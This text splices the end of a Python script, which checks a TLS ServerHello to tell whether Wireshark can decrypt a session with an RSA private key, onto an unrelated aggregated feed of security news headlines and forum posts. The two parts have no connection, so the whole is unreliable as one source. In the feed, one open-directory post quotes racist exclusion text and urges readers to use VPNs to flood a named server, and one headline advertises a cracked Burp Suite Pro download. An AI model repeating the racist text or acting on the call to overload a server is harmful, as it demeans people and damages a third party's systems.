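    0x002F: "TLS_RSA_WITH_AES_128_CBC_SHA",
    0x0035: "TLS_RSA_WITH_AES_256_CBC_SHA",
    0x003C: "TLS_RSA_WITH_AES_128_CBC_SHA256",
    0x009C: "TLS_RSA_WITH_AES_128_GCM_SHA256",
    0x009D: "TLS_RSA_WITH_AES_256_GCM_SHA384",
}
# Forward-secret suites: the RSA key only signs the handshake, so the private
# key cannot recover the session keys.
OTHER_SUITES = {
    0xC02F: "TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256",
    0xC030: "TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384",
    0x1301: "TLS_AES_128_GCM_SHA256",   # TLS 1.3
    0x1302: "TLS_AES_256_GCM_SHA384",   # TLS 1.3
}
SUPPORTED_VERSIONS_EXT = 0x002B


def parse_server_hello(record: bytes) -> Dict[str, int]:
    """Parse one TLS record carrying a ServerHello; return the negotiated
    protocol version and cipher suite."""
    ctype, _rec_version, rlen = struct.unpack("!BHH", record[:5])
    if ctype != 0x16:
        raise ValueError("not a handshake record")
    body = record[5:5 + rlen]
    if body[0] != 0x02:
        raise ValueError("not a ServerHello")
    hlen = int.from_bytes(body[1:4], "big")
    hs = body[4:4 + hlen]
    version = struct.unpack("!H", hs[:2])[0]      # legacy_version
    off = 2 + 32                                  # skip server random
    off += 1 + hs[off]                            # skip session_id
    suite = struct.unpack("!H", hs[off:off + 2])[0]
    off += 2 + 1                                  # suite + compression method
    if off + 2 <= len(hs):                        # optional extensions block
        ext_len = struct.unpack("!H", hs[off:off + 2])[0]
        off += 2
        end = off + ext_len
        while off + 4 <= end:
            etype, elen = struct.unpack("!HH", hs[off:off + 4])
            off += 4
            # TLS 1.3 keeps legacy_version 0x0303 and signals 0x0304 here
            if etype == SUPPORTED_VERSIONS_EXT and elen == 2:
                version = struct.unpack("!H", hs[off:off + 2])[0]
            off += elen
    return {"version": version, "cipher_suite": suite}


def rsa_key_can_decrypt(record: bytes) -> Tuple[bool, str]:
    """True when Wireshark's RSA key list can decrypt this session."""
    info = parse_server_hello(record)
    suite = info["cipher_suite"]
    name = RSA_KX_SUITES.get(suite) or OTHER_SUITES.get(suite) or f"0x{suite:04X}"
    if info["version"] >= 0x0304:
        return False, f"TLS 1.3 ({name}): always ephemeral; use a key log file"
    if suite in RSA_KX_SUITES:
        return True, f"{name}: static RSA; the server private key decrypts"
    return False, f"{name}: ephemeral key exchange; use a key log file"


def build_server_hello(suite: int, tls13: bool = False) -> bytes:
    """Constructed fixture: a minimal ServerHello record with a zero random
    and an empty session id (not real traffic)."""
    ext = struct.pack("!HHH", SUPPORTED_VERSIONS_EXT, 2, 0x0304) if tls13 else b""
    hs = (struct.pack("!H", 0x0303) + bytes(32) + b"\x00"
          + struct.pack("!H", suite) + b"\x00"
          + struct.pack("!H", len(ext)) + ext)
    body = b"\x02" + len(hs).to_bytes(3, "big") + hs
    return struct.pack("!BHH", 0x16, 0x0303, len(body)) + body


if __name__ == "__main__":
    for suite, tls13 in ((0x009C, False), (0xC02F, False), (0x1301, True)):
        print(rsa_key_can_decrypt(build_server_hello(suite, tls13)))
```

In a real capture, read the cipher suite from the ServerHello packet in Wireshark. If it is an ECDHE or TLS 1.3 suite, the private key cannot help, whatever format it is in; the client or server has to export the session secrets to a key log (browsers and curl honour the SSLKEYLOGFILE environment variable; an in-house OpenSSL 1.1.1+ client can register SSL_CTX_set_keylog_callback), and the capture must also contain the full handshake, not just the Application Data records.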
  • Open

    SecWiki News 2022-06-26 Review
QingTing: a Security Tool Orchestration Platform by ourren; Tracking and Interpreting the US EINSTEIN Program (2022 v1) by ourren; Named-Entity Recognition Based on Continual Learning by ourren; Space Cybersecurity Risks and Attack-Defense Exercises by ourren. For more recent articles, visit SecWiki.
  • Open

    Video analysis of police brutality against abortion rights activists.
    In a ruling that was as groundbreaking as it was controversial, six of the nine high courts overturned federal abortion law on Friday… Continue reading on Medium »
    SPY NEWS: 2022 — Week 25
    Summary of the espionage-related news stories for the Week 25 (19–25 June) of 2022. Continue reading on Medium »
  • Open

    [Cullinan #39] SRI and File Inclusion
This is Cullinan log #39. Content on SRI (Subresource Integrity) and File Inclusion (LFI/RFI) has been added. As for changes, a ZAP PassiveScan script was added under Prototype Pollution, and several items under XSS and Path Traversal were improved 😊 New: SRI (Subresource Integrity); File Inclusion / LFI, RFI. Updated: Cullinan > Prototype Pollution > ZAP Scripting; Cullinan > XSS > Bypass > JSFuck; Cullinan > XSS > Bypass > JSFuck Hangul; Cullinan > XSS > Bypass > JSFuck 8; Cullinan > XSS > Bypass > With Strtoupper; Cullinan > XSS > Bypass > Data URI XSS; Cullinan > XSS > Exploit > Find DOM Objects; Cullinan > XSS > Exploit > Set Cookie; Cullinan > Path Traversal > Exploit > API Path Tampering; Cullinan > Path Traversal > Exploit > Relative Path Overwrite
  • Open

    Great Open Source Vulnerability Scanner on GitHub
    Article URL: https://github.com/mageni/mageni Comments URL: https://news.ycombinator.com/item?id=31882071 Points: 1 # Comments: 0

  • Open

    Jump starting an investigation ( school assignment)
So I was given a flash drive to analyze and the files are of a .001, .002, .003, etc... It's been a while since I've done such an assignment, due to many General Ed and such classes since my last Forensics class. Any help on how I can proceed from this? I tried Encase and it only gives me the .001 file to load, but I proceed to do that and nothing happens. Any help would be greatly appreciated. submitted by /u/DeviantWolfe [link] [comments]
    What do you think about this workstation I built.
    submitted by /u/L4Z3R_H4WK [link] [comments]
  • Open

    Basic WebAssembly buffer overflow exploitation
    submitted by /u/chaplja [link] [comments]
  • Open

Unified Identity Management: From Analysis to a Record of Implementation
A unified identity management scheme offers some useful reference for advancing the industry's increasingly strict standardisation work.
  • Open

Which resume is best? The one I created with Canva or the one I created with Word?
    word : https://drive.google.com/file/d/12x7-ENfdy9NI1nWpELRQCWCprJb4_FQG/view?usp=sharing canva : https://drive.google.com/file/d/1H-E8cOfq3sKC6onlJY2ZxN5nkQ7-mRni/view?usp=sharing submitted by /u/Appropriate_Text1996 [link] [comments]
    Aiming for SOC analyst positions, overhauled my resume, how's it look?
    Taking Security+ in 3 weeks (been studying for the past few months). My goal is become a SOC analyst as I really like working with technical data. My background is in gov / DOD intel and I previously applied to a bunch of entry level cyber jobs but got like 1 response so I completely redid my resume and tried to make the skills as relatable to netsec as possible. After I have Sec+ I'm planning to get my hands on an open source SIEM and get familiar with it at home. Possibly also going to study for CySA+ too while I apply for jobs. How does my resume look (as someone trying to transition into network security)? Any other ways / things I can do to make myself standout (again specifically going for SOC analyst)? And what's missing (beyond the obvious like experience with specific tools, SIEMs, IDS, IPS, firewalls, etc.)? Greatly appreciate any input / suggestions as I've been attempting to get into network security for a while now! https://imgur.com/a/3tPLmF3 submitted by /u/Anontrovert [link] [comments]
    How to set up a laptop as a dedicated mal-lab that has access to my home network for malware to send and receive traffic but cannot propagate to the rest of my devices?
    Hey all, After several years of self-teaching myself malware analysis, I was recently hired as a junior malware analyst for an IR company and I love it. Naturally, I want to practice at home in my free time as much as possible to continue learning. All of my independent analysis at home for learning purposes has been conducted in VMware for the ability to set everything up with my tools, snapshot, and go to town. As we all know, the problem with analyzing most modern malware on a VM is: Contains many methodologies to detect a virtual environment that is frankly a pain to attempt to circumvent. Only continues its malicious execution or drop/download of files from C2C if it can establish a genuine, consistent network connection. This is where isolating a VM from a network and attempting to use tools like FakeNet is rather difficult as while it's spoofing responses, the malware is still not able to download additional malicious files. That said, is it possible to take a laptop that I have and turn it into a glorified malware lab that can: Somehow contain the ability to revert to a "snapshot" as you'd see with a VM. Connect to my home network so the malware can send and receive legitimate network traffic while remaining separate from the other devices on my network (maybe a VLAN somehow?). Thank you, guys! submitted by /u/decyphier_ [link] [comments]
  • Open

    Russian tanks and other military stuff
    Russian tanks, pictures and blueprints http://armchairgeneral.com/rkkaww2/galleries/ ​ A blog from around 2001-2003, not much content but some interesting thoughts on Afghanistan from then along with a handful of pictures from there. http://www.nuui.com/Sections/ ​ airwar dot ru/other/ (Reddit auto spam filters hate this one which is why there's no URL) /draw, /draw2, and /draw3 have .zips of airplane diagrams, /manuals has a handful of plane manuals Also see airwar dot ru/image/ submitted by /u/c-rn [link] [comments]
    A Few ODs I have found in a span of a Couple Days.
Some random ODs, not worth a single post, so I saved them and am posting them as a list. http://francois-planchu.com/images/ (Someone's personal site, random pictures [Contains NSFW]) https://www.fundacionrenta.com/assets/ (Stock images, fonts, and other assets) https://www.propweb.in/assets/ (More random assets) https://www.etrio.in/blog/ (Some Indian EV website data, images, catalog, promos) submitted by /u/amritajaatak [link] [comments]
    Time Magazine 1923-2014
    https://magazineproject.org/TIMEvault/ submitted by /u/c-rn [link] [comments]
    Does anyone else get a 403 Forbidden error when attempting to span hosts?
    As the title says. When I go to an imgur link directly, I can download just fine, but if I have to use the span hosts option in wget, I receive a 403 Forbidden error. Is there an explanation? submitted by /u/FuckedUpRetort [link] [comments]
    Commodore Amiga screenshots and box art
    http://www.amigalive.com/game-images/ submitted by /u/c-rn [link] [comments]
    Open directory of a cosplayer
    http://www.hosting.tk-lee.com/ Didn't look through everything so tagging nsfw submitted by /u/c-rn [link] [comments]
  • Open

    SecWiki News 2022-06-25 Review
No news updated today. For more recent articles, visit SecWiki.
  • Open

    List of ARM cores affected by PACMAN vulnerability
    Article URL: https://developer.arm.com/documentation/ka005109/1-0?lang=en Comments URL: https://news.ycombinator.com/item?id=31876148 Points: 2 # Comments: 0
  • Open

    HDX (Headline Crypto) INCENTIVIZED TESTNET QUICK GUIDE, WITH 250,000 $HDX AS REWARDS
    HEADLINE Crypto is a Texas-based blockchain project and token from the team behind AlgoPay, AlgoCloud, Vaults Protocol, FORUM, PIPELINE-UI… Continue reading on Medium »
    INFORMATIX TESTNET COMPETITION QICK GUIDE, 750,000 $INFO tokens up for grabs
    Infomatix is a data collection tool that aims to build the worlds most comprehensive financial database through crowd sourced expertise. Continue reading on Medium »
MSA Weekly 1 — "5 OSes for Cyber Security"
If we talk about operating systems (OS), there are a great many developers out there who build/develop operating systems… Continue reading on Medium »
    How I stopped hunting on HackerOne after years because they stole my $50k. And so should you.
    You may have heard about Belarusian security researcher xnwup and the story of blocking his $25k on HackerOne. It was pretty resonant at… Continue reading on Medium »
  • Open

    Next 13 Chrome extensions for OSINT
    We continue to look for extensions for the Google CHROME browser for you, which will help in the difficult task of finding information in… Continue reading on Medium »
    Instagram Information Gathering Tools
    I write this blog for those aspirants that have too enthusiastic to make a career in the field of Ethical hacking. for making a profession… Continue reading on Medium »
  • Open

    Meta from HackTheBox — Detailed Walkthrough
    No content preview

  • Open

    Harmless NumPy issue receives CVE medium
    Article URL: https://github.com/numpy/numpy/issues/18993 Comments URL: https://news.ycombinator.com/item?id=31870409 Points: 3 # Comments: 0
  • Open

    Basic XSS Bypasses
    Alert(1) Continue reading on Medium »
Cyber security is an activity carried out with the aim of securing and preventing…
With the many cybercrime incidents around the world, it would be good for us to produce and gather people who are skilled in… Continue reading on Medium »
    Writing your own Burpsuite Extensions: Complete Guide
    Recently I had to create some extensions for Burpsuite. I tried finding resources that could help me but couldn’t find much. Most of them… Continue reading on Medium »
    IDOR leads to revoke access from third party user account
    Hello everyone , Continue reading on Medium »
    How I was able to delete any users’ OAUTH connections via IDOR
    ﷽ Continue reading on Medium »
    Sensitive Token Leakage from server side
Hi all, I'm back with a new hacking story! So, one month ago I was hunting on a VDP program which is one of India's most successful… Continue reading on Medium »
    An Out Of Scope domain Leads To a Critical Bug[$1500]
    Hello All, I am Shakti Ranjan Mohanty (3ncryptsaan). Continue reading on Medium »
    CVE Hunting Tips #002
    Text Input Denials of Service Continue reading on The Mayor »
    SAUCERSWAP TESTNET BUG BOUNTY WITH 1,250,000 SAUCE AS REWARD
    About Sauceswap Continue reading on Medium »
  • Open

    [NSFW] Lots of beach cheeks
    submitted by /u/oDeathwingo [link] [comments]
    Radio Dramas
    https://ganahee.com/archive/Shows/ submitted by /u/c-rn [link] [comments]
    Index of /
    submitted by /u/taramj13 [link] [comments]
    Talking History - never been seen here before *apparently* & an oldie but a goodie - updated due to uhh... landing page.
    https://www.albany.edu/talkinghistory/pacifica-archives/ NO BLACKS NO INDIANS NO JEWS LIBERAL SUBNET BANS APPLIED CHINA AND RUSSIA WELCOME VISIT VIA: http://109.120.203.163/web/blyad.club/Music/ EDIT: Can I suggest we all use Chinese and Russian vpns to hammer the living shit out of blyad.club. submitted by /u/ringofyre [link] [comments]
  • Open

    CyberTalents — Airport
    Ok so OSINT was not my strong suit. Continue reading on Medium »
    War in Ukraine / June 23
    Ukraine retreats from Severodonetsk Continue reading on Medium »
  • Open

    Best thing to learn for SOC Analyst?
    Hey guys I am looking to get my Security+ by the end of the summer and finish my Cyber security related diploma in College by the end of the year. Any recommendations on which SIEM I should learn? What is most common? I was thinking ELK, Splunk, or QRadar? submitted by /u/kingkarmaxii [link] [comments]
    Signing into Windows 10 with a School account on a new User
    So I'm just starting Uni and I have been given a Microsoft 365 account from them. If I sign in as a new user on my PC with the school account, what data do they have access to? I have a D drive on my PC with family photos, receipts, tax info etc that I don't really want my school having access to. Are they able to see other drives on my device? or do they only see what's in OneDrive and what I do on edge while signed into my school's 365 account in the browser? Thanks! submitted by /u/Dazr87 [link] [comments]
  • Open

    Analyzing a macro enabled office file.
    Hi! So if you’re using Microsoft Office and you been around for quite a while. You probably heard about Macros? Continue reading on Medium »
    Red Team and Blue Team Training
    Modern malware actors get into the companies’ networks and steal any sensitive data they need. One of the effective ways to keep the… Continue reading on Medium »
  • Open

    Netsec Goggle for Brave Search
    submitted by /u/alxjsn [link] [comments]
    Hagana - A novel approach to runtime protection for NodeJS to prevent supply chain attacks
    submitted by /u/beckerman_jacob [link] [comments]
    Playing Docker? Bad Containers and What They Teach Us
    submitted by /u/Illustrious_Yard_576 [link] [comments]
    The curious tale of a fake Carrier.app
    submitted by /u/lormayna [link] [comments]
    CookieMonsteRCE: Stored XSS to RCE in Zena
    submitted by /u/jibblz [link] [comments]
    The Far Point of a Static Encounter
    submitted by /u/amirshk [link] [comments]
  • Open

    Looking for recommendations to include in a presentation for people starting out in DFIR
    What are some important things to discuss for people who may or may not be looking to have a career in DFIR? I'm mainly going to be talking about my career progression in DFIR (how I got into it, how I got into my current position, etc) but I want to make the majority of the presentation helpful and about the audience. How can I make it entertaining, engaging and knowledgeable? I don't want to make it too technical, as majority of the audience will be non-technical. Any help is appreciated! submitted by /u/haloman882 [link] [comments]
    Cellebrite vs. Oxygen
    Hi all I would like to ask what experiences you have had with both tools and where you see the advantages and disadvantages of the two solutions. As far as I know, cellebrite's strengths lie mainly in its support for older devices. I also find the tool a bit more user-friendly. I also noticed that with Oxygen it is not possible to hide all the data that you are no longer allowed to have in an OFBR backup. What are the other strengths and weaknesses of the tools mentioned? Many thanks for your help :) submitted by /u/B-Boy_DG_ [link] [comments]
    add NSRL hashset to EnCase Forensics V8.05
Hi Forensicators, pretty much what the title says: I am trying to add the latest RDS minimal NSRL hashset to EnCase Forensic v8.05. The hashset I downloaded from the NIST website is a zip file which upon extraction is a bunch of text files. But I think EnCase is looking for a different format and throws an error that HashRoot.bin is not available. Can someone help me with the link to download the latest NSRL hashset in the EnCase format, or some other way to add this hashset? Thanks. submitted by /u/AcalTheNerd [link] [comments]
  • Open

    SecWiki News 2022-06-24 Review
Thoughts on the Evolution of Security Teams and Personal Positioning by ourren; A First Look at Mapping the Cyberspace Battlefield Environment by ourren; Reviewing the Satellite Wars: the Hack-A-Sat 2 Space-Based Attack-Defense Competition by ourren; Reviewing the Satellite Wars: the Hack-A-Sat 1 Space-Based Attack-Defense Competition by ourren. For more recent articles, visit SecWiki.
  • Open

Static Code Analysis: The C Language Chapter
Starting with this article, the author opens a series on C code security analysis, dissecting in detail the technical specifics of static code analysis for C.
FreeBuf Morning Report | CNKI placed under cybersecurity review; attackers exploit Log4Shell to break into VMware servers
On 23 June 2022 the Cybersecurity Review Office summoned the head of Tongfang Knowledge Network (Beijing) Technology Co., Ltd. and announced the launch of a cybersecurity review of CNKI.
Cunning Kitten: a threat group targeting people connected to the Middle East
Cunning Kitten focuses its attacks on Persian-speaking individuals around the world, using political topics those targets care about as lures.
QNAP warns that a critical PHP vulnerability can lead to remote code execution
QNAP is addressing a critical PHP vulnerability that could be used to achieve remote code execution.
LambdaGuard: a security auditing tool for AWS serverless environments
AWS Lambda is the event-driven serverless compute platform provided by Amazon Web Services.
NSO finally admits it: at least five European countries are using Pegasus spyware
The controversial Israeli surveillance-software vendor NSO Group has admitted to EU lawmakers that at least five countries in Europe have used its Pegasus spyware.
CISA: threat actors exploit the Log4Shell vulnerability to compromise VMware servers
Recently CISA stated that threat actors, including state-sponsored hacking groups, are still using the Log4Shell (CVE-2021-44228) remote code execution vulnerability against VMware Horizon and Unified Access Gateway (UAG) servers. Attackers can remotely exploit Log4Shell on vulnerable servers exposed to local or Internet access, then move laterally across the network until they gain access to internal systems holding sensitive data. After the disclosure in December 2021, multiple threat actors
FreeBuf Weekly | US authorities say they have dismantled the RSOCKS botnet; Facebook faces a class action
Happy weekend, FreeBufers! Below is this week's FreeBuf Weekly, in which we summarise and recommend the week's hot news, quality articles and handy tools so that you don't miss any of this week's highlights.
Top 10 Vulnerability Scanning Tools of 2022
A roundup of ten vulnerability scanners.
One of the hardest-grinding ransomware groups ever, working more than 14 hours a day
When even ransomware groups grind this hard, you can imagine the pressure on the security industry, which is forced to keep pace.
  • Open

    ZAP Forced User Mode!!
Since last year I think I have talked a lot about ZAP's Authentication / Authorization features, and I have actually been applying and using many of them in testing: Authentication Spidering in ZAP, ZAP Script-based Authentication, and so on. There was just one feature I never really reached for, and that is Forced User Mode. Forced User Mode is, as the name says, a mode that forces a User. Normally we configure Authentication in a Context and then pick a User in Spidering, ActiveScan and so on; this mode instead applies that User by default to every feature, without selecting it separately. So, as shown above, when you access a page through the Proxy in that state, ZAP automatically performs the login and then sets up the session. In the end, without logging in yourself, once it is set up in ZAP you can get automatic login with a different account each time 😍 Example: Starbucks once again kindly serves as the test target. After configuring Authentication I enabled Forced User Mode and opened a new browser. While the browser is opening, ZAP automatically performs the login, and if you watch the browser screen closely it switches from an unauthenticated user to an authenticated one. Set user: so when several Users are registered and used within a Context, which account becomes the Forced User? It is the account specified under Context > Forced User. When testing Access Control and the like with several accounts you usually add many accounts under Users, and with this setting you can switch ZAP to use whichever account you want. Conclusion: I had assumed the user was fixed only for features such as Spidering and ActiveScan and was not very interested, but applying a user to the whole Proxy...
  • Open

    There Is More Than One Way to Sleep: Dive Deep Into the Implementations of API Hammering by Various Malware Families
    Learn about the unique implementations of API Hammering malware samples and how to mitigate them. The post There Is More Than One Way to Sleep: Dive Deep Into the Implementations of API Hammering by Various Malware Families appeared first on Unit 42.
  • Open

    WordPress WP HTML Mail plugin Vulnerable to XSS
    The XSS vulnerability in the WordPress WP HTML Mail plugin for personalized emails makes it vulnerable to code injection and phishing… Continue reading on Medium »

  • Open

    Chrome 104 Beta: New Media Query Syntax, Region Capture, and More
    Unless otherwise noted, changes described below apply to the newest Chrome beta channel release for Android, Chrome OS, Linux, macOS, and Windows. Learn more about the features listed here through the provided links or from the list on ChromeStatus.com. Chrome 104 is beta as of June 23, 2022. You can download the latest on Google.com for desktop or on Google Play Store on Android. Region Capture Chrome on Desktop can now crop self-captured video tracks. Web apps are already able to capture video in a tab using getDisplayMedia(). Region capture allows web apps to crop a track and remove content from it, typically before sharing it remotely. For example, consider a productivity web app with built-in video conferencing. During a video conference, a web app could use cropping to exclude th…
  • Open

    Burpsuite Pro crack Download in kali Linux
    Hello Friends Continue reading on Medium »
    Find SSRF , LFI , XSS using httpx , waybackurls , gf , gau , qsreplace
    Hello Beautiful hackers Continue reading on Medium »
    Intigriti — XSS Challenge — May 2022 — Bug Bounty Hunting — Writeup
    Hello guys I am back again. So let’s start talking rn bc I’m tired of everything. Continue reading on Medium »
    Intigriti — XSS Challenge — April 2022 — Bug Bounty Hunting — Writeup
    Hello guys I am back again. So let’s start talking rn bc this writeup will be long. Continue reading on Medium »
    Intigriti — XSS Challenge — March 2022 — Bug Bounty Hunting — Writeup
    Hello guys I am back again. This challenge was pretty interesting and one of my fav. Let’s start talking instead of wasting our time. Continue reading on Medium »
    Intigriti — XSS Challenge — February 2022 — Bug Bounty Hunting — Writeup
    Hello guys I am back. This challenge was awesome btw. So let’s start talking. Continue reading on Medium »
    Intigriti — XSS Challenge — January 2022 — Bug Bounty Hunting — Writeup
    Hello guys I am back. I was bored so I decided to post some Intigriti’s writeups until new XSS challenge comes now at June 20. So let’s… Continue reading on Medium »
    NahamCon CTF 2022 — Web Exploitation — All Challenges — Writeup
    Hello my name is rootjkqsta. I am Bug Bounty Hunter, Web App Pentester, Security Researcher and CTF player. So I was thinking why not to… Continue reading on Medium »
    Recon — All In One, Fast, Easy Recon Tool (HydraRecon)
    HydraRecon tool is an automated tool developed in the Python language which performs the task of Information Gathering and Crawling the… Continue reading on Medium »
  • Open

    DC Firewall segmentation alternatives
    Hello, We currently do not have any DC firewall at our healthcare facility. We cater for around 4000 users. It is a single site and there are remote vpn vendors connecting to support medical equipment. All vlans are behind the core switches. Now segmentation is one area we want to address, but not sure with plugging in a DC firewall is still the goto solution, as it can cause impact, be a SPOF. There are many other offerings claiming to do this , like NAC vendors, endpoint firewall agents , etc. I have been hearing positive things about Cisco tetration as well. Appreciate your inputs about segmentation paths experience other than internal/dc firewalling submitted by /u/MoeShea [link] [comments]
    Cheap and efficient way to host WP website in many different countries
    So for my undergraduate degree I'm developing a honeypot WordPress website and I want to host this website in different countries to see if the attacks differ depending on geographical differences. Now I can go ahead and buy a package from ex. Kinsta for 5 different websites and pay 150$ for that, but before I do that do you guys recommend any other more clever and more cost efficient idea to solve my issue. submitted by /u/krullmizter [link] [comments]
  • Open

    Information Leak: Posted, Discovered & Misused! How easy for Criminals to get your data?
    No content preview
    Why is the Zero Trust Security Model Effective?
    No content preview
  • Open

    Ukraine War —  Geolocation #1
    On 08/03/2022, Twitter user @tinso_ww tweeted the following video consisting of two video clips taken from a UAV in Ukraine. Continue reading on Medium »
    War in Ukraine / June 22
    The Ukrainian agricultural sector estimates losses of $23 billion. This will also hurt world food prices Continue reading on Medium »
    OCTOSUITE — Advanced GitHub OSINT Framework
    OCTOSUITE is a tool that makes it easy to extract a variety of data from a public GitHub profile. Continue reading on 100security »
    OSINTEYE — PyPI, GitHub, Instagram e DockerHub
    OSINTEYE is a tool that makes it easy to extract a variety of data from a public profile on PyPI, GitHub, Instagram… Continue reading on 100security »
    A short glossary of 12 Cybersecurity Techniques
    A short list of some cybersecurity techniques, both computer and human. Continue reading on Medium »
    The history of the internet and the first search engines
    How, when and by whom was the internet created? The history of ARPANET. About the first computer networks, FTP servers, web scanners, crawlers and search engines. Continue reading on KR. LABORATORIES IT BLOG »
  • Open

    Fuzzing rust-minidump for Embarrassment and Crashes – Part 2
    Article URL: https://hacks.mozilla.org/2022/06/fuzzing-rust-minidump-for-embarrassment-and-crashes/ Comments URL: https://news.ycombinator.com/item?id=31852480 Points: 103 # Comments: 2
  • Open

    Any DFIR-Orc user who could help with KAPE embedding?
    Hello, I’m an intern in a company’s forensics lab. My job is to set up DFIR-Orc (artifact collector from ANSSI) to replace the Velociraptor collector we currently use. Atm I’m having issues trying to embed KAPE inside of Orc. I’m able to run KAPE from DFIR-Orc, but KAPE isn’t able to find the .tkape files so it doesn’t collect anything of course. Does anyone know or has anyone already used DFIR-Orc here who would be willing to help? Thanks. Edit: I’ve tried to find resources online, but nobody seems to have ever done this before, so I’m trying my luck here submitted by /u/Aigle13 [link] [comments]
  • Open

    This repo contains information about EDRs that can be useful during red team exercise.
    submitted by /u/M_Reza_Bakhtiyari [link] [comments]
    Miracle - One Vulnerability To Rule Them All
    submitted by /u/scopedsecurity [link] [comments]
    fuzzuli is a fuzzing tool that aims to find critical backup files by creating a dynamic wordlist based on the domain.
    submitted by /u/0xmusana [link] [comments]
    Understanding the Compound File Binary Format and OLE Structures to Mess with CVE-2022-30190
    submitted by /u/canmaplap [link] [comments]
  • Open

    SecWiki News 2022-06-23 Review
    No new news today~ For more of the latest articles, visit SecWiki
  • Open

    How to use SMBSessionSpoofer to spoof SMB sessions
    SMBSessionSpoofer is a security tool for SMB sessions that helps researchers easily create a spoofed SMB session.
    Exploiting leaked cloud host AK/SK credentials
    Cloud hosts verify the identity of a request's sender by means of an Access Key Id / Secret Access Key based cryptographic method.
    FreeBuf Morning Report | Northwestern Polytechnical University hit by overseas cyberattack; Conti ransomware attacked more than 40 organizations in one month
    The Lyceum group is known for targeting the energy and telecommunications sectors in the Middle East and relies mainly on .NET-based malware.
    How to use Blackbird for social-media OSINT by username
    About Blackbird: Blackbird is a powerful open-source intelligence gathering tool that helps researchers quickly search up to 119 social media sites by a target user's username and collect information about the related accounts. Blackbird supports asynchronous HTTP requests, which greatly improves its efficiency and performance. Features: 1. Local web server 2. Search by username 3. Metadata extraction 4. JSON data reading and storage 5. Report generation 6. High efficiency and speed. Supported social media sites: the current ver
    Lithuania hit by cyberattacks after "embargo" on Russia
    Recently, the emerging hacker group "Cyber Spetsnaz" appears to have turned its sights on Lithuanian government resources and critical infrastructure.
    MEGA fixes critical vulnerabilities that allowed user data to be decrypted
    MEGA has released a security update to address a series of serious vulnerabilities that could expose user data.
    "Opinions on Building a Basic Data System to Better Leverage the Role of Data Elements" approved
    Building the basic data system concerns the overall situation of national development and security; national data security must be safeguarded, personal information and trade secrets protected, and construction of the basic data system accelerated.
    Process protection implemented with ObRegisterCallbacks
    This article briefly explains how to use ObRegisterCallbacks to implement process protection.
    Microsoft: Russia will step up cyberattacks on Ukraine's allies
    Russian intelligence agencies have stepped up cyberattacks on the governments of countries allied with Ukraine.
    Game security | Analyzing the chat-message CALL: analyzing the parameters
    Making videos is hard work, please like, favorite and share, many thanks~ Add the official account "极安御信安全研究院" and send the code word "资料" (materials) to receive the tools, source code and study materials related to the video, plus other free reverse-engineering courses. To join the discussion group, send the code word "交流群" (discussion group).
    Cybersecurity new-force founders: whom will investors and industry judges pick?
    Open up the new cybersecurity universe, come cheer for the founder you support!
    If the Three Kingdoms had cybersecurity attack-and-defense exercises
    The essence of war is confrontation between people; to some extent, cyber attack and defense is simply war taking place in the virtual world.
  • Open

    Tails 5.1.1 is out – fixes high severity CVE-2021-38385
    Article URL: https://tails.boum.org/news/version_5.1.1/index.en.html Comments URL: https://news.ycombinator.com/item?id=31847510 Points: 2 # Comments: 0

  • Open

    Bypass for Domain-level redirects (Unvalidated Redirects and Forwar)
    GitLab disclosed a bug submitted by thypon: https://hackerone.com/reports/1582160
    Able to approve admin approval and change effective status without adding payment details .
    Reddit disclosed a bug submitted by bisesh: https://hackerone.com/reports/1543159 - Bounty: $5000
  • Open

    Received scam email and the "From" field was my email
    Hi. How attacker spoofed my email address? The email didn't pass the SPF and DMARC, but still I got the message. I got this email: https://www.brendinghat.com/2022/06/20/there-is-an-overdue-payment-under-your-name-please-settle-your-debts-asap/ submitted by /u/athanielx [link] [comments]
    Phone stolen, thief somehow got my banking info. I'm confused as to how, help.
    So June 11th, I go out to a bar in downtown Montréal, my phone gets stolen, only my phone, I still have my cards and all. I change my passcodes to everything that night, except my bank. I can’t because I need the verification code they’d send to my phone. I have 2 factor authentication so the thieves would theoretically need my debit card number, my password, and the pin that gets sent to my phone to get into my mobile banking. Somehow today I get a “pre authorized debit DOB” that pops up on my account for 999$; this type of transfer requires the thief to have my account number and the transit number, which are only in the mobile banking app. Now my question is, how would someone get the info off my mobile bank? (Oh also, I deactivated my SIM card the next morning after the theft, and through Find My Phone the minute the phone touches wifi it wipes all the contents.) Just confused as to how this possibly could have happened. submitted by /u/Working-Plantain8273 [link] [comments]
    Azure firewall log analysis tool
    What do you all use in the way of log analysis tools to monitor and dashboard out your firewall data as it pertains to the various managed resources w/in your environments that are externally facing? submitted by /u/Dalgan [link] [comments]
    Best Sandbox Solution(s)?
    Hello all. In a government subcontractor environment, I get asked a couple times a month, "This file is suspicious, can you open it in a sandbox for me?" But I am not sure what I can use to do this. I know Microsoft Office has a sandboxing capability but not sure how I make sure my file is opened in sandbox. It is quite finicky. Are there any other applications that can be used instead? What sandbox application/ solution are you using? T.I.A. submitted by /u/NoMomNotTheBelt14 [link] [comments]
  • Open

    Dos and Windows 3.x Software
    submitted by /u/ilikemacsalot [link] [comments]
  • Open

    Bug Bounty Tips #001
    Unverified Password Change Continue reading on The Mayor »
    Bug Bounty Tips #001
    Finding Projects Continue reading on The Mayor »
    $1500 Of Broken Access Controls
    Hello, Continue reading on Medium »
    Critical Git Repository Leaked Internal Data
    Description: Continue reading on Medium »
    2 GREAT TOOLS FOR PENTESTER
    Hi guys! I’m back with a new blog, this will be short but I think it’s great because I’ll show you two tools that are for me now basic for… Continue reading on Medium »
  • Open

    War in Ukraine / June 21
    Belarus continues to be a problem for Ukraine Continue reading on Medium »
    Proper Development Update of gotEM and Recent Events
    Hello community! Continue reading on Medium »
  • Open

    SecWiki News 2022-06-22 Review
    ysuserial: Java deserialization vulnerability exploitation tool by ourren; When XM 12 meets eBPF by ourren; 2022 Internet of Vehicles Data Security Supervision Research Report by ourren; Overview of the telecom network fraud black/gray market ecosystem: infrastructure by ourren; MITRE supply chain security trusted system technical framework (SoT™) by ourren; Measuring Kazakhstan's large-scale interception of HTTPS by Avenger. For more of the latest articles, visit SecWiki
  • Open

    Improvements for Go fuzzing in version 1.19
    Article URL: https://www.code-intelligence.com/blog/fuzzing-golang-1.19 Comments URL: https://news.ycombinator.com/item?id=31835857 Points: 6 # Comments: 1
  • Open

    FreeBuf Morning Report | An open-source project has 49 vulnerabilities on average; Amazon launches AWS Center for Quantum Networking
    On June 21 Europol announced the dismantling of a criminal group involved in phishing, fraud and money laundering.
